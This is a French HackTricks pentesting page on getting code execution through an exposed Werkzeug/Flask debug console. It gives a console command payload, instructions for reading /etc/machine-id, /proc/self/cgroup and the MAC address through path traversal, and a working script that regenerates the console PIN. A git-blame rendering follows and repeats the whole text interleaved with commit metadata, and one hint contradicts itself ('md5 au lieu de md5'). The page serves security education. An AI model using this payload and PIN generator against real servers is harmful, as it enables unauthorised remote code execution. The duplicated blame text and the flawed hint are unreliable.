hacktricks/network-services-pentesting/pentesting-web/werkzeug.md

# Werkzeug / Flask Debug

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

<figure><img src="../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>

[**DragonJAR Security Conference est un événement international de cybersécurité**](https://www.dragonjarcon.org/) avec plus d'une décennie qui se tiendra les 7 et 8 septembre 2023 à Bogotá, Colombie. C'est un événement de contenu technique de haut niveau où les dernières recherches en espagnol sont présentées, attirant des hackers et des chercheurs du monde entier.\
Inscrivez-vous dès maintenant sur le lien suivant et ne manquez pas cette grande conférence !:

{% embed url="https://www.dragonjarcon.org" %}

## Console RCE

Si le débogage est actif, vous pouvez essayer d'accéder à `/console` et obtenir une RCE.
```python
__import__('os').popen('whoami').read();
```
![](<../../.gitbook/assets/image (317).png>)

Il existe également plusieurs exploits sur internet comme [celui-ci](https://github.com/its-arun/Werkzeug-Debug-RCE) ou un dans metasploit.

## Pin protégé - Traversée de chemin

Dans certains cas, le point de terminaison **`/console`** sera protégé par un code PIN. Si vous avez une **vulnérabilité de traversée de fichier**, vous pouvez divulguer toutes les informations nécessaires pour générer ce code PIN.

### Exploitation de code PIN de la console Werkzeug

**Copié depuis le premier lien.**\
Voir le message "console verrouillée" de Werkzeug en forçant la page d'erreur de débogage dans l'application.
```
The console is locked and needs to be unlocked by entering the PIN.
You can find the PIN printed out on the standard output of your
shell that runs the server
```
Localisez la console de débogage Werkzeug vulnérable à l'adresse `vulnerable-site.com/console`, mais elle est verrouillée par un code PIN secret.

Vous pouvez inverser l'algorithme qui génère le code PIN de la console. Examinez le fichier `__init__.py` de débogage de Werkzeug sur le serveur, par exemple `python3.5/site-packages/werkzeug/debug/__init__.py`. Vous pouvez consulter [**le dépôt de code source de Werkzeug**](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/\_\_init\_\_.py) **pour vérifier comment le code PIN est généré**, mais il est préférable de divulguer le code source grâce à une **vulnérabilité de traversée de fichier** car les versions diffèrent probablement.

Variables nécessaires pour exploiter le code PIN de la console :
```python
probably_public_bits = [
    username,
    modname,
    getattr(app, '__name__', getattr(app.__class__, '__name__')),
    getattr(mod, '__file__', None),
]

private_bits = [
    str(uuid.getnode()),
    get_machine_id(),
]
```
#### **`probably_public_bits`**

* **`username`** est l'utilisateur qui a démarré ce Flask
* **`modname`** est flask.app
* `getattr(app, '__name__', getattr (app .__ class__, '__name__'))` est **Flask**
* `getattr(mod, '__file__', None)` est le **chemin absolu de `app.py`** dans le répertoire flask (par exemple `/usr/local/lib/python3.5/dist-packages/flask/app.py`). Si `app.py` ne fonctionne pas, **essayez `app.pyc`**

#### `private_bits`

*   `uuid.getnode()` est l'**adresse MAC de l'ordinateur actuel**, `str(uuid.getnode())` est l'expression décimale de l'adresse MAC.

    * Pour **trouver l'adresse MAC du serveur**, il faut savoir quelle **interface réseau est utilisée** pour servir l'application (par exemple `ens3`). Si elle est inconnue, **fuite de `/proc/net/arp`** pour l'ID de l'appareil, puis **fuite** de l'adresse MAC à **`/sys/class/net/<device id>/address`**.

    Convertir **de l'adresse hexadécimale à la représentation décimale** en exécutant en python par exemple :

    ```python
    # It was 56:00:02:7a:23:ac
    >>> print(0x5600027a23ac)
    94558041547692
    ```
* `get_machine_id()` concatène les **valeurs dans `/etc/machine-id`**, **`/proc/sys/kernel/random/boot_id`** et **la première ligne de `/proc/self/cgroup`** après le dernier slash (`/`).

<details>

<summary>Code de get_machine_id()</summary>
```python
def get_machine_id() -> t.Optional[t.Union[str, bytes]]:                                                                                                  
    global _machine_id

    if _machine_id is not None:
        return _machine_id

    def _generate() -> t.Optional[t.Union[str, bytes]]:
        linux = b""

        # machine-id is stable across boots, boot_id is not.
        for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id": 
            try:
                with open(filename, "rb") as f:
                    value = f.readline().strip()
            except OSError:
                continue

            if value:
                linux += value
                break

        # Containers share the same machine id, add some cgroup
        # information. This is used outside containers too but should be
        # relatively stable across boots.
        try:
            with open("/proc/self/cgroup", "rb") as f:
                linux += f.readline().strip().rpartition(b"/")[2]
        except OSError:
            pass

        if linux:
            return linux

        # On OS X, use ioreg to get the computer's serial number.
        try:
```
</details>

Une fois que toutes les variables sont préparées, exécutez le script d'exploitation pour générer le code PIN de la console Werkzeug :
```python
import hashlib
from itertools import chain
probably_public_bits = [
    'web3_user',# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.5/dist-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '279275995014060',# str(uuid.getnode()),  /sys/class/net/ens33/address
    'd4e6cb65d59544f3331ea0425dc555a1'# get_machine_id(), /etc/machine-id
]

#h = hashlib.md5() # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)
```
{% hint style="success" %}
Si vous utilisez une **ancienne version** de Werkzeug, essayez de changer l'algorithme de hachage en md5 au lieu de md5.
{% endhint %}

## Références

* [**https://www.daehee.com/werkzeug-console-pin-exploit/**](https://www.daehee.com/werkzeug-console-pin-exploit/)
* [**https://ctftime.org/writeup/17955**](https://ctftime.org/writeup/17955)

<figure><img src="../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>

[**DragonJAR Security Conference est un événement international de cybersécurité**](https://www.dragonjarcon.org/) qui a plus d'une décennie et qui se tiendra les **7 et 8 septembre 2023** à Bogotá, en Colombie. C'est un événement de contenu technique élevé où les dernières recherches en espagnol sont présentées, attirant des hackers et des chercheurs du monde entier.\
Inscrivez-vous dès maintenant sur le lien suivant et ne manquez pas cette grande conférence !:

{% embed url="https://www.dragonjarcon.org" %}

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated ['README.md', 'macos-hardening/macos-security-and-privilege-e 2023-06-10 23:58:31 +00:00			`# Werkzeug / Flask Debug`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`* Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop) !`
Translated ['README.md', 'macos-hardening/macos-security-and-privilege-e 2023-06-10 23:58:31 +00:00			`* Découvrez [The PEASS Family](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated to French 2023-06-03 13:10:46 +00:00			`* Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Rejoignez le [💬](https://emojipedia.org/speech-balloon/) [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe telegram](https://t.me/peass) ou suivez moi sur Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated ['README.md', 'macos-hardening/macos-security-and-privilege-e 2023-06-10 23:58:31 +00:00			`<figure><img src="../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>`
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00
Translated ['README.md', 'macos-hardening/macos-security-and-privilege-e 2023-06-10 23:58:31 +00:00			`[DragonJAR Security Conference est un événement international de cybersécurité](https://www.dragonjarcon.org/) avec plus d'une décennie qui se tiendra les 7 et 8 septembre 2023 à Bogotá, Colombie. C'est un événement de contenu technique de haut niveau où les dernières recherches en espagnol sont présentées, attirant des hackers et des chercheurs du monde entier.\`
Translated to French 2023-06-03 13:10:46 +00:00			`Inscrivez-vous dès maintenant sur le lien suivant et ne manquez pas cette grande conférence !:`
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00
			`{% embed url="https://www.dragonjarcon.org" %}`

GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00			`## Console RCE`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			Si le débogage est actif, vous pouvez essayer d'accéder à `/console` et obtenir une RCE.
GitBook: [master] 2 pages and one asset modified 2020-07-30 18:28:28 +00:00			```python
			`__import__('os').popen('whoami').read();`
			```
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`![](<../../.gitbook/assets/image (317).png>)`
GitBook: [master] 2 pages and one asset modified 2020-07-30 18:28:28 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`Il existe également plusieurs exploits sur internet comme [celui-ci](https://github.com/its-arun/Werkzeug-Debug-RCE) ou un dans metasploit.`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`## Pin protégé - Traversée de chemin`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated ['README.md', 'macos-hardening/macos-security-and-privilege-e 2023-06-08 17:55:49 +00:00			Dans certains cas, le point de terminaison `/console` sera protégé par un code PIN. Si vous avez une vulnérabilité de traversée de fichier, vous pouvez divulguer toutes les informations nécessaires pour générer ce code PIN.
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated ['README.md', 'macos-hardening/macos-security-and-privilege-e 2023-06-08 17:55:49 +00:00			`### Exploitation de code PIN de la console Werkzeug`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`Copié depuis le premier lien.\`
			`Voir le message "console verrouillée" de Werkzeug en forçant la page d'erreur de débogage dans l'application.`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			`The console is locked and needs to be unlocked by entering the PIN.`
			`You can find the PIN printed out on the standard output of your`
			`shell that runs the server`
			```
Translated ['README.md', 'macos-hardening/macos-security-and-privilege-e 2023-06-08 17:55:49 +00:00			Localisez la console de débogage Werkzeug vulnérable à l'adresse `vulnerable-site.com/console`, mais elle est verrouillée par un code PIN secret.
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated ['README.md', 'macos-hardening/macos-security-and-privilege-e 2023-06-08 17:55:49 +00:00			Vous pouvez inverser l'algorithme qui génère le code PIN de la console. Examinez le fichier `__init__.py` de débogage de Werkzeug sur le serveur, par exemple `python3.5/site-packages/werkzeug/debug/__init__.py`. Vous pouvez consulter [le dépôt de code source de Werkzeug](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/\_\_init\_\_.py) pour vérifier comment le code PIN est généré, mais il est préférable de divulguer le code source grâce à une vulnérabilité de traversée de fichier car les versions diffèrent probablement.
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`Variables nécessaires pour exploiter le code PIN de la console :`
GitBook: [master] one page modified 2020-11-22 21:53:42 +00:00			```python
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			`probably_public_bits = [`
			`username,`
			`modname,`
			`getattr(app, '__name__', getattr(app.__class__, '__name__')),`
			`getattr(mod, '__file__', None),`
			`]`

			`private_bits = [`
			`str(uuid.getnode()),`
			`get_machine_id(),`
			`]`
			```
GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00			#### `probably_public_bits`

Translated to French 2023-06-03 13:10:46 +00:00			* `username` est l'utilisateur qui a démarré ce Flask
			* `modname` est flask.app
			* `getattr(app, '__name__', getattr (app .__ class__, '__name__'))` est Flask
			* `getattr(mod, '__file__', None)` est le chemin absolu de `app.py` dans le répertoire flask (par exemple `/usr/local/lib/python3.5/dist-packages/flask/app.py`). Si `app.py` ne fonctionne pas, essayez `app.pyc`
GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00
			#### `private_bits`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			* `uuid.getnode()` est l'adresse MAC de l'ordinateur actuel, `str(uuid.getnode())` est l'expression décimale de l'adresse MAC.
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			* Pour trouver l'adresse MAC du serveur, il faut savoir quelle interface réseau est utilisée pour servir l'application (par exemple `ens3`). Si elle est inconnue, fuite de `/proc/net/arp` pour l'ID de l'appareil, puis fuite de l'adresse MAC à `/sys/class/net/<device id>/address`.
GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`Convertir de l'adresse hexadécimale à la représentation décimale en exécutant en python par exemple :`
GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00
			```python
			`# It was 56:00:02:7a:23:ac`
			`>>> print(0x5600027a23ac)`
			`94558041547692`
			```
Translated to French 2023-06-03 13:10:46 +00:00			* `get_machine_id()` concatène les valeurs dans `/etc/machine-id`, `/proc/sys/kernel/random/boot_id` et la première ligne de `/proc/self/cgroup` après le dernier slash (`/`).
GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00
			`<details>`

Translated to French 2023-06-03 13:10:46 +00:00			`<summary>Code de get_machine_id()</summary>`
GitBook: [master] one page modified 2020-11-22 21:53:42 +00:00			```python
GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00			`def get_machine_id() -> t.Optional[t.Union[str, bytes]]:`
			`global _machine_id`

			`if _machine_id is not None:`
			`return _machine_id`

			`def _generate() -> t.Optional[t.Union[str, bytes]]:`
			`linux = b""`

			`# machine-id is stable across boots, boot_id is not.`
			`for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id":`
			`try:`
			`with open(filename, "rb") as f:`
			`value = f.readline().strip()`
			`except OSError:`
			`continue`

			`if value:`
			`linux += value`
			`break`

			`# Containers share the same machine id, add some cgroup`
			`# information. This is used outside containers too but should be`
			`# relatively stable across boots.`
			`try:`
			`with open("/proc/self/cgroup", "rb") as f:`
			`linux += f.readline().strip().rpartition(b"/")[2]`
			`except OSError:`
			`pass`

			`if linux:`
			`return linux`

			`# On OS X, use ioreg to get the computer's serial number.`
			`try:`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			```
GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00			`</details>`

Translated to French 2023-06-03 13:10:46 +00:00			`Une fois que toutes les variables sont préparées, exécutez le script d'exploitation pour générer le code PIN de la console Werkzeug :`
GitBook: [master] one page modified 2020-11-22 21:53:42 +00:00			```python
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			`import hashlib`
			`from itertools import chain`
			`probably_public_bits = [`
GitBook: [master] 2 pages modified 2021-03-18 22:41:37 +00:00			`'web3_user',# username`
			`'flask.app',# modname`
			`'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))`
			`'/usr/local/lib/python3.5/dist-packages/flask/app.py' # getattr(mod, '__file__', None),`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			`]`

			`private_bits = [`
GitBook: [master] 2 pages modified 2021-03-18 22:41:37 +00:00			`'279275995014060',# str(uuid.getnode()), /sys/class/net/ens33/address`
			`'d4e6cb65d59544f3331ea0425dc555a1'# get_machine_id(), /etc/machine-id`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			`]`

GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00			`#h = hashlib.md5() # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0`
			`h = hashlib.sha1()`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			`for bit in chain(probably_public_bits, private_bits):`
GitBook: [master] 2 pages modified 2021-03-18 22:41:37 +00:00			`if not bit:`
			`continue`
			`if isinstance(bit, str):`
			`bit = bit.encode('utf-8')`
			`h.update(bit)`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00			`h.update(b'cookiesalt')`
			`#h.update(b'shittysalt')`

			`cookie_name = '__wzd' + h.hexdigest()[:20]`

			`num = None`
			`if num is None:`
GitBook: [master] 2 pages modified 2021-03-18 22:41:37 +00:00			`h.update(b'pinsalt')`
			`num = ('%09d' % int(h.hexdigest(), 16))[:9]`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
			`rv =None`
			`if rv is None:`
GitBook: [master] 2 pages modified 2021-03-18 22:41:37 +00:00			`for group_size in 5, 4, 3:`
			`if len(num) % group_size == 0:`
			`rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')`
			`for x in range(0, len(num), group_size))`
			`break`
			`else:`
			`rv = num`
GitBook: [master] one page modified 2020-11-22 21:47:52 +00:00
			`print(rv)`
			```
GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00			`{% hint style="success" %}`
Translated to French 2023-06-03 13:10:46 +00:00			`Si vous utilisez une ancienne version de Werkzeug, essayez de changer l'algorithme de hachage en md5 au lieu de md5.`
GITBOOK-3841: change request with no subject merged in GitBook 2023-03-28 21:30:40 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`## Références`
GITBOOK-3842: change request with no subject merged in GitBook 2023-03-28 22:07:13 +00:00
GITBOOK-3863: change request with no subject merged in GitBook 2023-04-05 15:16:57 +00:00			`* [https://www.daehee.com/werkzeug-console-pin-exploit/](https://www.daehee.com/werkzeug-console-pin-exploit/)`
			`* [https://ctftime.org/writeup/17955](https://ctftime.org/writeup/17955)`
GITBOOK-3842: change request with no subject merged in GitBook 2023-03-28 22:07:13 +00:00
Translated ['README.md', 'macos-hardening/macos-security-and-privilege-e 2023-06-10 23:58:31 +00:00			`<figure><img src="../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>`
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00
Translated ['README.md', 'macos-hardening/macos-security-and-privilege-e 2023-06-10 23:58:31 +00:00			`[DragonJAR Security Conference est un événement international de cybersécurité](https://www.dragonjarcon.org/) qui a plus d'une décennie et qui se tiendra les 7 et 8 septembre 2023 à Bogotá, en Colombie. C'est un événement de contenu technique élevé où les dernières recherches en espagnol sont présentées, attirant des hackers et des chercheurs du monde entier.\`
			`Inscrivez-vous dès maintenant sur le lien suivant et ne manquez pas cette grande conférence !:`
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00
			`{% embed url="https://www.dragonjarcon.org" %}`

Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['README.md', 'macos-hardening/macos-security-and-privilege-e 2023-06-08 17:55:49 +00:00			`* Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop) !`
Translated to French 2023-06-03 13:10:46 +00:00			`* Découvrez [The PEASS Family](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Rejoignez le [💬](https://emojipedia.org/speech-balloon/) [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe telegram](https://t.me/peass) ou suivez moi sur Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`